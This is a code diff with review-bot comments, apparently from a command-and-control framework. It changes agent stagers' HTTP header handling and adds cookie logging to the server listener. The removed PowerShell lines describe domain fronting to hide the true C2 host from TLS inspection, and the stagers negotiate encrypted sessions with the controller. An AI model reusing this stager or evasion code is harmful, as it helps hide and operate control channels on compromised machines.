diff --git a/data/agent/stagers/http.ps1 b/data/agent/stagers/http.ps1
index 12f43ba..594d134 100644
--- a/data/agent/stagers/http.ps1
+++ b/data/agent/stagers/http.ps1
@@ -211,21 +211,7 @@ function Start-Negotiate {
     $rc4p2 = ConvertTo-RC4ByteStream -RCK $($IV2+$SKB) -In $data2;
     $rc4p2 = $IV2 + $rc4p2 + $eb2;
-    # the User-Agent always resets for multiple calls...silly
-    if ($customHeaders -ne "") {
-        $headers = $customHeaders -split ',';
-        $headers | ForEach-Object {
-            $headerKey = $_.split(':')[0];
-            $headerValue = $_.split(':')[1];
-            #If host header defined, assume domain fronting is in use and add a call to the base URL first
-            #this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
-            if ($headerKey -eq "host"){
-                try{$ig=$WC.DownloadData($s)}catch{};
-            }
-
-            $wc.Headers.Add($headerKey, $headerValue);
-        }
-    }
+    # UA resets for every call with net.webclient
     $wc.Headers.Add("User-Agent",$UA);
     # step 5 of negotiation -> client posts nonce+sysinfo and requests agent
diff --git a/data/agent/stagers/http.py b/data/agent/stagers/http.py
index 4a9579a..3541774 100644
--- a/data/agent/stagers/http.py
+++ b/data/agent/stagers/http.py
@@ -48,12 +48,9 @@ for headerRaw in headersRaw:
     try:
         headerKey = headerRaw.split(":")[0]
         headerValue = headerRaw.split(":")[1]
-        if headerKey.lower() == "cookie":
-            headers['Cookie'] = "%s;%s" % (headers['Cookie'], headerValue)
-        else:
-            headers[headerKey] = headerValue
-    except:
-        pass
+        headers[headerKey] = headerValue
+    except Exception as e:
+        print e
 # stage 3 of negotiation -> client generates DH key, and POSTs HMAC(AESn(PUBc)) back to server
 clientPub = DiffieHellman()
diff --git a/lib/listeners/http.py b/lib/listeners/http.py
index 5628659..ed6a4d9 100644
--- a/lib/listeners/http.py
+++ b/lib/listeners/http.py
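Review bot: With the header loop removed, `$customHeaders` has no remaining consumer visible in this hunk; if it is still assigned earlier in Start-Negotiate it is now dead and should be dropped as well, or the replacement comment should state why custom headers are no longer applied at this step. The new `# UA resets for every call with net.webclient` explains only the User-Agent line, so a second line such as `# custom headers are no longer applied during negotiation` would make the intent explicit for the next reader. Start-Negotiate begins and ends outside the hunk.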
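Review bot: The new `except Exception as e: print e` leaves a debug print in the error path where the old code was silent; if that is intended it should be documented on the line, e.g. `# surface malformed header entries instead of dropping them silently`, otherwise it should be removed before merge. `print e` is Python 2 statement syntax, consistent with the rest of the file, so it is only valid while the file stays on Python 2. The `for headerRaw in headersRaw:` loop named in the hunk header starts outside the hunk.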
@@ -1128,6 +1128,30 @@ def send_message(packets=None):
             })
             dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
+            listenerName = self.options['Name']['Value']
+            try:
+                cookie = request.headers.get('Cookie')
+                if cookie and cookie != '':
+
+                    # see if we can extract the 'routing packet' from the specified cookie location
+                    # NOTE: this can be easily moved to a paramter, another cookie value, etc.
+
+                    message = "[*] POST cookie value from {} : {}".format(clientIP, cookie)
+                    signal = json.dumps({
+                        'print': False,
+                        'message': message
+                    })
+                    dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
+
+            except Exception as e:
+
+                message = "[!] Error retrieving cookie value from {}: {}".format(clientIP, e)
+                signal = json.dumps({
+                    'print': False,
+                    'message': message
+                })
+                dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
+
             # the routing packet should be at the front of the binary request.data
             # NOTE: this can also go into a cookie/etc.
             dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, requestData, listenerOptions, clientIP)
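Review bot: The new try/except block only logs the raw `Cookie` header and never uses it, so the `# see if we can extract the 'routing packet' ...` comment describes work the code does not do; either reword it to `# diagnostic only: log the raw Cookie header; routing-packet extraction from the cookie is not implemented yet` or hold the block until the extraction exists. `request.headers.get('Cookie')` and `str.format` do not raise on a missing header, so the `except Exception` branch is effectively unreachable, the `listenerName = self.options['Name']['Value']` reassignment repeats the value already used on the preceding context line, and `if cookie:` covers both `None` and `''`. Because the cookie is client-supplied, the message built from it is untrusted text; whatever later prints this signal should not assume it is free of newlines or terminal control sequences (the dispatcher side is outside this hunk, so this is an inference). The enclosing method starts before this hunk, as it relies on `self`, `request` and `clientIP` defined above.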